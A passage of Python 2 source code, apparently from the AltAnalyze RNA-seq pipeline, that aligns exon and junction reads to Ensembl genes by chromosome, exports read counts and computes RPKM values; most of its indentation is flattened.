except Exception: pass
try: pool.close(); pool.join(); pool = None
except Exception: pass
results=[] ### For single-thread compatible versions of Python
for search_chr in chromosomes:
result = p([],search_chr)
results.append(result)
results_organized=[]
for result_set in results:
        if len(result_set[0])>0: ### Sometimes chromosomes are missing
biotypes = result_set[0]
results_organized.append(list(result_set[1:]))
pooled_results = [sum(value) for value in zip(*results_organized)] # combine these counts
pooled_results = [biotypes]+pooled_results
    p.setCountsOverview(pooled_results) # store as retrievable objects
catFiles(countsFile,'Counts')
catFiles(junctionFile,'junctions')
catFiles(exonFile,'exons')
catFiles(junctionCompFile,'comps')
catFiles(novelJunctionAnnotations,'denovo')
if normalize_feature_exp == 'RPKM':
fastRPKMCalculate(countsFile)
rnaseq_end_time = time.time()
print '...RNA-seq import completed in',int(rnaseq_end_time-rnaseq_begin_time),'seconds\n'
biotypes = p.outputResults()
return biotypes
def alignCoordinatesToGeneExternal(species,coordinates_to_annotate):
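    ### Assign Ensembl gene IDs to externally supplied read coordinates grouped by (chromosome, strand); the coordinate objects are updated in place by geneAlign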
chr_strand_gene_dbs,location_gene_db,chromosomes,gene_location_db = getChromosomeStrandCoordinates(species,'no')
read_aligned_to_gene=0
for (chr,strand) in coordinates_to_annotate:
if (chr,strand) in chr_strand_gene_dbs:
chr_gene_locations = chr_strand_gene_dbs[chr,strand]
chr_reads = coordinates_to_annotate[chr,strand]
chr_gene_locations.sort(); chr_reads.sort()
            ### Set GeneID for each coordinate object (primary and secondary GeneIDs)
read_aligned_to_gene=geneAlign(chr,chr_gene_locations,location_gene_db,chr_reads,'no',read_aligned_to_gene)
### Gene objects will be updated
def catFiles(outFileDir,folder):
""" Concatenate all the chromosomal files but retain only the first header """
root_dir = export.findParentDir(outFileDir)+folder+'/'
dir_list = read_directory(root_dir)
firstFile=True
with open(filepath(outFileDir), 'w') as outfile:
for fname in dir_list:
chr_file = root_dir+fname
header=True
with open(filepath(chr_file)) as infile:
for line in infile:
if header:
header=False
if firstFile:
outfile.write(line)
firstFile=False
else: outfile.write(line)
export.deleteFolder(root_dir)
def error(msg, *args):
return multiprocessing.get_logger().error(msg, *args)
class AlignExonsAndJunctionsToEnsembl:
def setCountsOverview(self, overview):
self.biotypes_store, self.known_count, self.novel_junction_count, self.trans_splicing_reads, self.junctions_without_exon_gene_alignments, self.exons_without_gene_alignment_count = overview
def getChromosomes(self):
chr_list=list()
for c in self.chromosomes:
### Sort chromosome by int number
ci=string.replace(c,'chr','')
try: ci = int(ci)
except Exception: pass
chr_list.append((ci,c))
chr_list.sort()
chr_list2=list()
for (i,c) in chr_list: chr_list2.append(c) ### sorted
return chr_list2
def countsFile(self):
return string.replace(self.expfile,'exp.','counts.')
def junctionFile(self):
junction_file = self.root_dir+'AltDatabase/'+self.species+'/RNASeq/'+self.species + '_Ensembl_junctions.txt'
return junction_file
def exonFile(self):
exon_file = self.root_dir+'AltDatabase/'+self.species+'/RNASeq/'+self.species + '_Ensembl_exons.txt'
return exon_file
def junctionCompFile(self):
junction_comp_file = self.root_dir+'AltDatabase/'+self.species+'/RNASeq/'+self.species + '_junction_comps_updated.txt'
return junction_comp_file
def novelJunctionAnnotations(self):
junction_annotation_file = self.root_dir+'AltDatabase/ensembl/'+self.species+'/'+self.species + '_alternative_junctions_de-novo.txt'
return junction_annotation_file
def AnalysisMode(self): return self.analysisMode
def __init__(self,species,exp_file_location_db,dataset_name,testImport):
self.species = species; self.dataset_name = dataset_name
self.testImport = testImport
fl = exp_file_location_db[dataset_name]
bed_dir=fl.BEDFileDir()
root_dir=fl.RootDir()
#self.stdout = fl.STDOUT()
try: platformType = fl.PlatformType()
except Exception: platformType = 'RNASeq'
try: analysisMode = fl.AnalysisMode()
except Exception: analysisMode = 'GUI'
### This occurs when run using the BAMtoBED pipeline in the GUI
if 'exp.' not in dataset_name:
dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name:
dataset_name+='.txt'
self.dataset_name = dataset_name
### Import experimentally identified junction splice-sites
normalize_feature_exp = fl.FeatureNormalization()
if platformType == 'RNASeq':
chr_status = checkBEDFileFormat(bed_dir,root_dir) ### If false, need to remove 'chr' from the search_chr
else:
chr_status = True
#self.fl = fl # Can not pass this object in pool or it breaks
self.platformType = platformType
self.analysisMode = analysisMode
self.root_dir = root_dir
self.normalize_feature_exp = normalize_feature_exp
self.bed_dir = bed_dir
self.chr_status = chr_status
self.exonBedBuildStatus = fl.ExonBedBuildStatus()
self.expfile = root_dir+'ExpressionInput/'+dataset_name
if testImport == 'yes':
print 'Chromosome annotation detected =',chr_status
#if self.exonBedBuildStatus == 'yes':
reformatExonFile(species,'exon',chr_status) ### exports BED format exons for exon expression extraction
"""
Strategies to reduce memory in RNASeq:
1) (done)Delete old AltDatabase-local version if it exists before starting
2) (done)Check to see if a file exists before writing it and if so append rather than create
3) (done)Get counts last and normalize last in for exons and junctions separately.
4) (done)Delete objects explicitly before importing any new data (define a new function that just does this).
5) (done)Get all chromosomes first then parse exon and junction coordinate data on a per known chromosome basis.
        6) (done)Prior to deleting all junction/exon object info for each chromosome, save the coordinate(key)-to-annotation information for the read count export file."""
### Delete any existing annotation databases that currently exist (redundant with below)
deleteOldAnnotations(species,root_dir,dataset_name)
###Define variables to report once reads for all chromosomes have been aligned
#global self.known_count; global self.novel_junction_count; global self.one_found; global self.not_found; global self.both_found; global self.trans_splicing_reads
#global self.junctions_without_exon_gene_alignments; global self.exons_without_gene_alignment_count; global self.junction_simple_db; global self.chr_strand_gene_dbs
self.known_count=0; self.novel_junction_count=0; self.one_found=0; self.not_found=0; self.both_found=0; self.trans_splicing_reads=0
self.junctions_without_exon_gene_alignments=0; self.exons_without_gene_alignment_count=0; self.junction_simple_db={}
###Begin Chromosome specific read to exon alignments
self.chr_strand_gene_dbs,self.location_gene_db,chromosomes,self.gene_location_db = getChromosomeStrandCoordinates(species,testImport)
self.chromosomes = chromosomes
print "Processing exon/junction coordinates sequentially by chromosome"
print "Note: this step is time intensive (can be hours) and no print statements may post for a while"
def outputResults(self):
exportDatasetLinkedGenes(self.species,self.gene_location_db,self.root_dir) ### Include an entry for gene IDs to include constitutive expression for RPKM normalized data
chr_gene_locations=[]; self.location_gene_db=[]; self.chr_strand_gene_dbs=[]
#print 'user coordinates imported/processed'
#print 'Importing read counts from coordinate data...'
biotypes = self.biotypes_store
### Output summary statistics
if self.normalize_feature_exp != 'none':
print self.normalize_feature_exp, 'normalization complete'
if 'junction' in biotypes:
print 'Imported Junction Statistics:'
print ' ',self.known_count, 'junctions found in Ensembl/UCSC and',self.novel_junction_count,'are novel'
print ' ',self.trans_splicing_reads,'trans-splicing junctions found (two aligning Ensembl genes)'
print ' ',self.junctions_without_exon_gene_alignments, 'junctions where neither splice-site aligned to a gene'
if (float(self.known_count)*10)<float(self.novel_junction_count):
print '\nWARNING!!!!! Few junctions aligned to known exons. Ensure that the AltAnalyze Ensembl database\nversion matches the genome build aligned to!\n'
if 'exon' in biotypes:
print 'Imported Exon Statistics:'
            print ' ',self.exons_without_gene_alignment_count, 'exons that did not align to a gene'
print 'User databases and read counts written to:', self.root_dir[:-1]+'ExpressionInput'
### END CHROMOSOME SPECIFIC ANALYSES
if self.exonBedBuildStatus == 'yes':
bedfile = moveBAMtoBEDFile(self.species,self.dataset_name,self.root_dir)
print 'Exon BED file updated with novel exon predictions from junction file'
return bedfile; sys.exit()
clearObjectsFromMemory(self.junction_simple_db); self.junction_simple_db=[]
return biotypes
def test(self, search_chr):
print search_chr
def __call__(self, queue, search_chr):
try:
#sys.stdout = self.stdout
platformType = self.platformType
testImport = self.testImport
species = self.species
dataset_name = self.dataset_name
platformType = self.platformType
analysisMode = self.analysisMode
root_dir = self.root_dir
normalize_feature_exp = self.normalize_feature_exp
bed_dir = self.bed_dir
chr_status = self.chr_status
junction_annotations={}
if chr_status == False:
searchchr = string.replace(search_chr,'chr','')
else:
searchchr = search_chr
if platformType == 'RNASeq':
junction_db,biotypes,algorithms = importBEDFile(bed_dir,root_dir,species,normalize_feature_exp,searchChr=searchchr,testImport=testImport)
else:
normalize_feature_exp = 'quantile'
junction_db,biotypes,algorithms = importExpressionMatrix(bed_dir,root_dir,species,fl,'no',search_chr=searchchr)
self.biotypes_store = biotypes
if len(junction_db)>0:
### Determine which kind of data is being imported, junctions, exons or both
unmapped_exon_db={}
if 'junction' in biotypes:
### Get all known junction splice-sites
ens_junction_coord_db = importExonAnnotations(species,'junction_coordinates',search_chr)
if testImport == 'yes':
print len(ens_junction_coord_db),'Ensembl/UCSC junctions imported'
### Identify known junctions sites found in the experimental dataset (perfect match)
novel_junction_db={}; novel_exon_db={}
for key in junction_db:
ji=junction_db[key]
if ji.BioType()=='junction':
if key in ens_junction_coord_db:
jd=ens_junction_coord_db[key]
ji.setExonAnnotations(jd)
self.known_count+=1
else:
novel_junction_db[key]=junction_db[key]; self.novel_junction_count+=1
#if 75953254 in key: print key; sys.exit()
else:
unmapped_exon_db[key]=junction_db[key]
ens_exon_db = importExonAnnotations(species,'exon',search_chr)
if 'junction' in biotypes:
if testImport == 'yes':
print self.known_count, 'junctions found in Ensembl/UCSC and',len(novel_junction_db),'are novel.'
### Separate each junction into a 5' and 3' splice site (exon1_coord_db and exon2_coord_db)
exon1_coord_db={}; exon2_coord_db={}
for (chr,exon1_stop,exon2_start) in ens_junction_coord_db:
jd = ens_junction_coord_db[(chr,exon1_stop,exon2_start)]
exon1_coord_db[chr,exon1_stop] = jd.GeneID(),string.split(jd.ExonRegionIDs(),'-')[0]
exon2_coord_db[chr,exon2_start] = jd.GeneID(),string.split(jd.ExonRegionIDs(),'-')[1]
clearObjectsFromMemory(ens_junction_coord_db); ens_junction_coord_db=[] ### Clear object from memory
### Get and re-format individual exon info
exon_region_db={}
#if 'exon' not in biotypes:
for gene in ens_exon_db:
for rd in ens_exon_db[gene]:
exon_region_db[gene,rd.ExonRegionIDs()]=rd
### Add the exon annotations from the known junctions to the exons to export dictionary
exons_to_export={}
for key in junction_db:
ji=junction_db[key]
if ji.ExonAnnotations() != None:
jd = ji.ExonAnnotations()
exon1, exon2 = string.split(jd.ExonRegionIDs(),'-')
key1 = jd.GeneID(),exon1; key2 = jd.GeneID(),exon2
exons_to_export[key1] = exon_region_db[key1]
exons_to_export[key2] = exon_region_db[key2]
### For novel experimental junctions, identify those with at least one matching known 5' or 3' site
exons_not_identified = {}; novel_exon_coordinates={}
for (chr,exon1_stop,exon2_start) in novel_junction_db:
ji = novel_junction_db[(chr,exon1_stop,exon2_start)]
coord = [exon1_stop,exon2_start]; coord.sort()
if (chr,exon1_stop) in exon1_coord_db and (chr,exon2_start) in exon2_coord_db:
### Assign exon annotations to junctions where both splice-sites are known in Ensembl/UCSC
### Store the exon objects, genes and regions (le is a tuple of gene and exon region ID)
### Do this later for the below un-assigned exons
le=exon1_coord_db[(chr,exon1_stop)]; ji.setLeftExonAnnotations(le); ji.setLeftExonRegionData(exon_region_db[le])
re=exon2_coord_db[(chr,exon2_start)]; ji.setRightExonAnnotations(re); ji.setRightExonRegionData(exon_region_db[re])
if le[0] != re[0]: ### Indicates Trans-splicing (e.g., chr7:52,677,568-52,711,750 mouse mm9)
ji.setTransSplicing(); #print exon1_stop,le,exon2_start,re,ji.Chr(),ji.Strand()
self.both_found+=1; #print 'five',(chr,exon1_stop,exon2_start),exon1_coord_db[(chr,exon1_stop)]
else:
if (chr,exon1_stop) in exon1_coord_db: ### hence, exon1_stop is known, so report the coordinates of exon2 as novel
le=exon1_coord_db[(chr,exon1_stop)]; ji.setLeftExonAnnotations(le)
self.one_found+=1; #print 'three',(chr,exon1_stop,exon2_start),exon1_coord_db[(chr,exon1_stop)]
novel_exon_coordinates[ji.Chr(),exon2_start] = ji,'left',ji.Exon2Stop() ### Employ this strategy to avoid duplicate exons with differing lengths (mainly an issue if analyzing only exons results)
ji.setNovel('side')
elif (chr,exon2_start) in exon2_coord_db: ### hence, exon2_start is known, so report the coordinates of exon1 as novel
re=exon2_coord_db[(chr,exon2_start)]; ji.setRightExonAnnotations(re) ### In very rare cases, a gene can be assigned here, even though the splice-site is on the opposite strand (not worthwhile filtering out)
self.one_found+=1; #print 'three',(chr,exon1_stop,exon2_start),exon1_coord_db[(chr,exon1_stop)]
novel_exon_coordinates[ji.Chr(),exon1_stop] = ji,'right',ji.Exon1Start()
ji.setNovel('side')
else:
self.not_found+=1; #if self.not_found < 10: print (chr,exon1_stop,exon2_start)
novel_exon_coordinates[ji.Chr(),exon1_stop] = ji,'right',ji.Exon1Start()
novel_exon_coordinates[ji.Chr(),exon2_start] = ji,'left',ji.Exon2Stop()
ji.setNovel('both')
### We examine reads where one splice-site aligns to a known but the other not, to determine if trans-splicing occurs
try: exons_not_identified[chr,ji.Strand()].append((coord,ji))
except KeyError: exons_not_identified[chr,ji.Strand()] = [(coord,ji)]
"""
if fl.ExonBedBuildStatus() == 'no':
exportNovelJunctions(species,novel_junction_db,condition_count_db,root_dir,dataset_name,'junction') ### Includes known exons
"""
#print self.both_found, ' where both and', self.one_found, 'where one splice-site are known out of',self.both_found+self.one_found+self.not_found
#print 'Novel junctions where both splice-sites are known:',self.both_found
#print 'Novel junctions where one splice-site is known:',self.one_found
#print 'Novel junctions where the splice-sites are not known:',self.not_found
clearObjectsFromMemory(exon_region_db); exon_region_db=[] ### Clear memory of this object
read_aligned_to_gene=0
for (chr,strand) in exons_not_identified:
if (chr,strand) in self.chr_strand_gene_dbs:
chr_gene_locations = self.chr_strand_gene_dbs[chr,strand]
chr_reads = exons_not_identified[chr,strand]
chr_gene_locations.sort(); chr_reads.sort()
### Set GeneID for each coordinate object (primary and secondary GeneIDs)
read_aligned_to_gene=geneAlign(chr,chr_gene_locations,self.location_gene_db,chr_reads,'no',read_aligned_to_gene)
#print read_aligned_to_gene, 'novel junctions aligned to Ensembl genes out of',self.one_found+self.not_found
clearObjectsFromMemory(exons_not_identified); exons_not_identified=[] ## Clear memory of this object
for key in novel_junction_db:
(chr,exon1_stop,exon2_start) = key
ji=novel_junction_db[key]
if ji.GeneID() == None:
try:
if ji.SecondaryGeneID() != None:
### Occurs if mapping is to the 5'UTR of a gene for the left splice-site (novel alternative promoter)
ji.setGeneID(ji.SecondaryGeneID()); ji.setSecondaryGeneID(''); #print key, ji.GeneID(), ji.Strand(), ji.SecondaryGeneID()
except Exception: null=[]
if ji.GeneID() != None:
geneid = ji.GeneID()
proceed = 'no'
if ji.SpliceSitesFound() == None: proceed = 'yes'; coordinates = [exon1_stop,exon2_start]
elif ji.SpliceSitesFound() == 'left': proceed = 'yes'; coordinates = [exon1_stop,exon2_start]
elif ji.SpliceSitesFound() == 'right': proceed = 'yes'; coordinates = [exon1_stop,exon2_start]
if proceed == 'yes':
for coordinate in coordinates:
if ji.TransSplicing() == 'yes':
#print ji.Chr(),ji.GeneID(), ji.SecondaryGeneID(), ji.Exon1Stop(), ji.Exon2Start()
self.trans_splicing_reads+=1
if ji.checkExonPosition(coordinate) == 'right': geneid = ji.SecondaryGeneID()
if abs(exon2_start-exon1_stop)==1: eventType = 'novel-exon-intron' ### Indicates intron-exon boundary (intron retention)
else: eventType = 'novel'
exon_data = (coordinate,ji.Chr()+'-'+str(coordinate),eventType)
try: novel_exon_db[geneid].append(exon_data)
except KeyError: novel_exon_db[geneid] = [exon_data]
else:
### write these out
self.junctions_without_exon_gene_alignments+=1
### Remove redundant exon entries and store objects
for key in novel_exon_db:
exon_data_objects=[]
exon_data_list = unique.unique(novel_exon_db[key])
exon_data_list.sort()
for e in exon_data_list:
ed = ExonInfo(e[0],e[1],e[2])
exon_data_objects.append(ed)
novel_exon_db[key] = exon_data_objects
#print self.trans_splicing_reads,'trans-splicing junctions found (two aligning Ensembl genes).'
#print self.junctions_without_exon_gene_alignments, 'junctions where neither splice-site aligned to a gene'
#if 'X' in search_chr: print len(ens_exon_db),len(ens_exon_db['ENSMUSG00000044424'])
alignReadsToExons(novel_exon_db,ens_exon_db,testImport=testImport)
### Link exon annotations up with novel junctions
junction_region_db,exons_to_export = annotateNovelJunctions(novel_junction_db,novel_exon_db,exons_to_export)
### Add the exon region data from known Ensembl/UCSC matched junctions to junction_region_db for reciprocal junction analysis
for key in junction_db:
ji=junction_db[key]; jd = ji.ExonAnnotations()
try:
uid = jd.GeneID()+':'+jd.ExonRegionIDs(); ji.setUniqueID(uid)
try: junction_region_db[jd.GeneID()].append((formatID(uid),jd.ExonRegionIDs()))
except KeyError: junction_region_db[jd.GeneID()] = [(formatID(uid),jd.ExonRegionIDs())]
except AttributeError: null=[] ### Occurs since not all entries in the dictionary are perfect junction matches
try: novel_exon_coordinates = collapseNoveExonBoundaries(novel_exon_coordinates,root_dir+dataset_name) ### Joins inferred novel exon-IDs (5' and 3' splice sites) from adjacent and close junction predictions
except Exception: pass ### No errors encountered before
#if self.exonBedBuildStatus == 'yes':
### Append to the exported BED format exon coordinate file
bedfile = exportNovelExonToBedCoordinates(species,novel_exon_coordinates,chr_status,searchChr=searchchr)
### Identify reciprocal junctions and retrieve splice-event annotations for exons and inclusion junctions
junction_annotations,critical_exon_annotations = JunctionArray.inferJunctionComps(species,('RNASeq',junction_region_db,root_dir),searchChr=searchchr)
clearObjectsFromMemory(junction_region_db); junction_region_db=[]
### Reformat these dictionaries to combine annotations from multiple reciprocal junctions
junction_annotations = combineExonAnnotations(junction_annotations)
critical_exon_annotations = combineExonAnnotations(critical_exon_annotations)
if 'exon' in biotypes:
if testImport == 'yes':
print len(unmapped_exon_db),'exon genomic locations imported.'
### Create a new dictionary keyed by chromosome and strand
exons_not_aligned={}
for (chr,exon1_stop,exon2_start) in unmapped_exon_db:
ji = unmapped_exon_db[(chr,exon1_stop,exon2_start)]
coord = [exon1_stop,exon2_start]; coord.sort()
try: exons_not_aligned[chr,ji.Strand()].append((coord,ji))
except KeyError: exons_not_aligned[chr,ji.Strand()] = [(coord,ji)]
read_aligned_to_gene=0
for (chr,strand) in exons_not_aligned:
if (chr,strand) in self.chr_strand_gene_dbs:
chr_gene_locations = self.chr_strand_gene_dbs[chr,strand]
chr_reads = exons_not_aligned[chr,strand]
chr_gene_locations.sort(); chr_reads.sort()
read_aligned_to_gene=geneAlign(chr,chr_gene_locations,self.location_gene_db,chr_reads,'no',read_aligned_to_gene)
#print read_aligned_to_gene, 'exons aligned to Ensembl genes out of',self.one_found+self.not_found
align_exon_db={}; exons_without_gene_alignments={}; multigene_exon=0
for key in unmapped_exon_db:
(chr,exon1_stop,exon2_start) = key
ji=unmapped_exon_db[key]
if ji.GeneID() == None:
try:
if ji.SecondaryGeneID() != None:
### Occurs if mapping outside known exon boundaries for one side of the exon
ji.setGeneID(ji.SecondaryGeneID()); ji.setSecondaryGeneID(''); #print key, ji.GeneID(), ji.Strand(), ji.SecondaryGeneID()
except Exception: null=[]
else:
if 'ENS' in ji.JunctionID():
if ji.GeneID() not in ji.JunctionID(): ### Hence, there were probably two overlapping Ensembl genes and the wrong one was assigned based on the initial annotations
original_geneid = string.split(ji.JunctionID(),':')[0]
if original_geneid in ens_exon_db: ji.setGeneID(original_geneid) #check if in ens_exon_db (since chromosome specific)
if ji.GeneID() != None:
geneid = ji.GeneID()
coordinates = [exon1_stop,exon2_start]
for coordinate in coordinates:
if ji.TransSplicing() != 'yes': ### This shouldn't occur for exons
exon_data = (coordinate,ji.Chr()+'-'+str(coordinate),'novel')
try: align_exon_db[geneid].append(exon_data)
except KeyError: align_exon_db[geneid] = [exon_data]
else:
multigene_exon+=1 ### Shouldn't occur due to a fix in the gene-alignment method which will find the correct gene on the 2nd iteration
else: exons_without_gene_alignments[key]=ji; self.exons_without_gene_alignment_count+=1
### Remove redundant exon entries and store objects (this step may be unnecessary)
for key in align_exon_db:
exon_data_objects=[]
exon_data_list = unique.unique(align_exon_db[key])
exon_data_list.sort()
for e in exon_data_list:
ed = ExonInfo(e[0],e[1],e[2])
exon_data_objects.append(ed)
align_exon_db[key] = exon_data_objects
#print self.exons_without_gene_alignment_count, 'exons where neither aligned to a gene'
#if self.exons_without_gene_alignment_count>3000: print 'NOTE: Poor mapping of these exons may be due to an older build of\nEnsembl than the current version. Update BAMtoBED mappings to correct.'
begin_time = time.time()
alignReadsToExons(align_exon_db,ens_exon_db)
end_time = time.time()
if testImport == 'yes':
print 'Exon sequences aligned to exon regions in',int(end_time-begin_time),'seconds'
### Combine the start and end region alignments into a single exon annotation entry
combineDetectedExons(unmapped_exon_db,align_exon_db,novel_exon_db)
clearObjectsFromMemory(unmapped_exon_db); clearObjectsFromMemory(align_exon_db); clearObjectsFromMemory(novel_exon_db)
unmapped_exon_db=[]; align_exon_db=[]; novel_exon_db=[]
"""
if fl.ExonBedBuildStatus() == 'no':
exportNovelJunctions(species,exons_without_gene_alignments,condition_count_db,root_dir,dataset_name,'exon') ### Includes known exons
"""
clearObjectsFromMemory(exons_without_gene_alignments); exons_without_gene_alignments=[]
### Export both exon and junction annotations
if 'junction' in biotypes:
### Export the novel user exon annotations
exportDatasetLinkedExons(species,exons_to_export,critical_exon_annotations,root_dir,testImport=testImport,searchChr=searchchr)
### Export the novel user exon-junction annotations (original junction_db objects updated by above processing)
exportDatasetLinkedJunctions(species,junction_db,junction_annotations,root_dir,testImport=testImport,searchChr=searchchr)
### Clear memory once results are exported (don't want to delete actively used objects)
if 'junction' in biotypes:
clearObjectsFromMemory(exons_to_export); clearObjectsFromMemory(critical_exon_annotations)
clearObjectsFromMemory(novel_junction_db); novel_junction_db=[]
clearObjectsFromMemory(novel_exon_coordinates); novel_exon_coordinates=[]
exons_to_export=[]; critical_exon_annotations=[]
clearObjectsFromMemory(exon1_coord_db); clearObjectsFromMemory(exon2_coord_db)
exon1_coord_db=[]; exon2_coord_db=[]
if 'exon' in biotypes:
clearObjectsFromMemory(exons_not_aligned); exons_not_aligned=[]
clearObjectsFromMemory(ens_exon_db); ens_exon_db=[]
### Add chromosome-specific junction_db data to a simple whole genome dictionary
for key in junction_db:
ji = junction_db[key]
if ji.GeneID()!=None and ji.UniqueID()!=None: self.junction_simple_db[key]=ji.UniqueID()
#returnLargeGlobalVars()
clearObjectsFromMemory(junction_db); clearObjectsFromMemory(junction_annotations)
junction_db=[]; junction_annotations=[]; chr_reads=[]
for biotype in biotypes:
### Import Read Counts (do this last to conserve memory)
if platformType == 'RNASeq':
condition_count_db,exon_len_db,biotypes2,algorithms = importBEDFile(bed_dir,root_dir,species,normalize_feature_exp,getReads=True,searchChr=searchchr,getBiotype=biotype,testImport=testImport,filteredJunctions=self.junction_simple_db)
else:
condition_count_db,exon_len_db,biotypes2,algorithms = importExpressionMatrix(bed_dir,root_dir,species,fl,'yes',getBiotype=biotype)
###First export original counts, rather than quantile normalized or RPKM
self.exportJunctionCounts(species,self.junction_simple_db,exon_len_db,condition_count_db,root_dir,dataset_name,biotype,'counts',searchChr=searchchr)
clearObjectsFromMemory(condition_count_db); clearObjectsFromMemory(exon_len_db); condition_count_db=[]; exon_len_db=[]
if analysisMode == 'commandline':
print 'finished parsing data for chromosome:',search_chr ### Unix platforms are not displaying the progress in real-time
else:
pass #print "*",
try: queue.put([self.biotypes_store, self.known_count, self.novel_junction_count, self.trans_splicing_reads, self.junctions_without_exon_gene_alignments, self.exons_without_gene_alignment_count])
except Exception:
### If queue is not a multiprocessing object
queue = [self.biotypes_store, self.known_count, self.novel_junction_count, self.trans_splicing_reads, self.junctions_without_exon_gene_alignments, self.exons_without_gene_alignment_count]
return queue
except Exception:
print traceback.format_exc()
error(traceback.format_exc())
multiprocessing.log_to_stderr().setLevel(logging.DEBUG)
raise
def exportJunctionCounts(self,species,junction_simple_db,exon_len_db,condition_count_db,root_dir,dataset_name,biotype,count_type,searchChr=None):
if 'exp.' not in dataset_name: dataset_name = 'exp.'+dataset_name
if '.txt' not in dataset_name: dataset_name+='.txt'
export_path = root_dir+'ExpressionInput/'+dataset_name
if count_type == 'counts':
export_path = string.replace(export_path,'exp.','counts.') ### separately export counts
if searchChr !=None:
export_path = string.replace(export_path,'ExpressionInput','ExpressionInput/Counts')
export_path = string.replace(export_path,'.txt','.'+searchChr+'.txt')
self.countsFile = export_path
if self.testImport == 'yes':
print 'Writing',export_path
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
title = ['AltAnalyze_ID']
for condition in condition_count_db: title.append(condition)
export_data.write(string.join(title,'\t')+'\n')
for key in self.junction_simple_db:
chr,exon1_stop,exon2_start = key
if biotype == 'junction':
coordinates = chr+':'+str(exon1_stop)+'-'+str(exon2_start)
elif biotype == 'exon':
coordinates = chr+':'+str(exon1_stop-1)+'-'+str(exon2_start+1)
try:
null=exon_len_db[key]
if count_type == 'counts': values = [self.junction_simple_db[key]+'='+coordinates]
else: values = [self.junction_simple_db[key]]
for condition in condition_count_db: ###Memory crash here
count_db = condition_count_db[condition]
try: read_count = count_db[key]
except KeyError: read_count = '0'
values.append(read_count)
export_data.write(string.join(values,'\t')+'\n')
except Exception: null=[]
export_data.close()
def countsDir(self):
return self.countsFile
def calculateRPKMsFromGeneCounts(filename,species,AdjustExpression):
""" Manual way of calculating gene RPKMs from gene counts only """
gene_lengths = getGeneExonLengths(species)
fastRPKMCalculate(filename,GeneLengths=gene_lengths,AdjustExpression=AdjustExpression)
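### Hedged usage sketch for calculateRPKMsFromGeneCounts above (the path and species are hypothetical):
### gene-level RPKMs are derived from a gene-count matrix using the summed annotated exon length per gene.
#calculateRPKMsFromGeneCounts('/data/ExpressionInput/counts.MyGeneCounts.txt','Hs',True)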
def fastRPKMCalculate(counts_file,GeneLengths=None,AdjustExpression=True):
export_path = string.replace(counts_file,'counts.','exp.')
export_data = export.ExportFile(export_path) ### Write this new file
fn=filepath(counts_file); header=True
exon_sum_array=[]; junction_sum_array=[]
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
samples = t[1:]
header=False
exon_sum_array=[0]*len(samples)
junction_sum_array=[0]*len(samples)
else:
try: values = map(float,t[1:])
except Exception:
print traceback.format_exc()
print t
badCountsLine ### undefined name: deliberately raises a NameError to halt on a malformed counts line
### get the total reads/sample
if '-' in string.split(t[0],'=')[0]:
junction_sum_array = [sum(value) for value in zip(*[junction_sum_array,values])]
else:
exon_sum_array = [sum(value) for value in zip(*[exon_sum_array,values])]
with warnings.catch_warnings():
warnings.filterwarnings("ignore",category=RuntimeWarning) ### hides warnings associated with Scipy for n=1 sample comparisons
jatr=Average(junction_sum_array) # Average of the total mapped reads
eatr=Average(exon_sum_array) # Average of the total mapped reads
if AdjustExpression:
offset = 1
else:
offset = 0
header=True
c=math.pow(10.0,9.0)
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
export_data.write(line) ### Write header
header=False
else:
try:
exon_id,coordinates = string.split(t[0],'=')
coordinates = string.split(coordinates,':')[1]
coordinates = string.split(coordinates,'-')
l=abs(int(coordinates[1])-int(coordinates[0])) ### read-length
except Exception: ### Manual way of calculating gene RPKMs from gene counts only
exon_id = t[0]
try: l = GeneLengths[exon_id]
except Exception: continue #Occurs when Ensembl genes supplied from an external analysis
try: read_counts = map(lambda x: int(x)+offset, t[1:])
except Exception: read_counts = map(lambda x: int(float(x))+offset, t[1:])
if '-' in exon_id:
count_stats = zip(read_counts,junction_sum_array)
atr = jatr
l=60
else:
count_stats = zip(read_counts,exon_sum_array)
atr = eatr
values=[]
#rpkm = map(lambda (r,t): c*(r/(t*l)), count_stats) ### Efficient way to convert to rpkm, but doesn't work for 0 counts
for (r,t) in count_stats:
if r == 1: ###This adjustment allows us to obtain more realistic folds when a zero count is compared, using log2
t = atr
try:
rpkm = str(c*(r/(t*l)))
#print c,r,t,l,exon_id,rpkm;sys.exit()
values.append(rpkm)
except Exception,e:
print e
print t[0]
print 'Error Encountered... Exon or Junction of zero length encountered... RPKM failed... Exiting AltAnalyze.'
print 'This error may be due to inconsistent file naming. If both exon and junction sample data are present, make sure they are named properly.'
print 'For example: cancer1__exon.bed, cancer1__junction.bed (double underscore required to match these samples up)!'
print [r,t,l];k=1; forceError ### undefined name: deliberately raises a NameError to exit
values = string.join([exon_id]+values,'\t')+'\n'
export_data.write(values)
export_data.close()
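### The sketch below illustrates the per-feature RPKM arithmetic applied in fastRPKMCalculate above
### (a minimal, self-contained example with hypothetical numbers; it is not called by AltAnalyze).
### Junction features use a fixed effective length of 60nt above, while exons use their coordinate span.
def exampleRPKM(read_count=250.0, total_mapped_reads=2.0e7, feature_length=120.0):
    import math
    c=math.pow(10.0,9.0) ### reads-per-kilobase-per-million scaling constant
    return c*(read_count/(total_mapped_reads*feature_length))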
def mergeCountFiles(counts_file1,counts_file2):
### Used internally to merge count files that are very large and too time-consuming to regenerate
export_path = string.replace(counts_file2,'counts.','temp-counts.')
export_data = export.ExportFile(export_path) ### Write this new file
fn=filepath(counts_file1); header=True
count_db={}
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
samples = t[1:]
header=False
si = samples.index('H9.102.2.5.bed')+1
else:
try: value = t[si]
except Exception: print t; sys.exit()
### get the total reads/sample
count_db[t[0]] = value
fn=filepath(counts_file2); header=True
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if header:
samples = t[1:]
header=False
si = samples.index('H9.102.2.5.bed')+1
export_data.write(line)
else:
try: t[si] = count_db[t[0]]
except Exception: pass ### keep the current value
export_data.write(string.join(t,'\t')+'\n')
export_data.close()
def getGeneExonLengths(species):
gene_lengths={}
filename = 'AltDatabase/'+species+'/RNASeq/'+species+'_Ensembl_exons.txt'
fn=filepath(filename)
firstLine=True
for line in open(fn,'rU').xreadlines():
line = line.rstrip('\n')
if firstLine:
firstLine=False
else:
t = string.split(line,'\t')
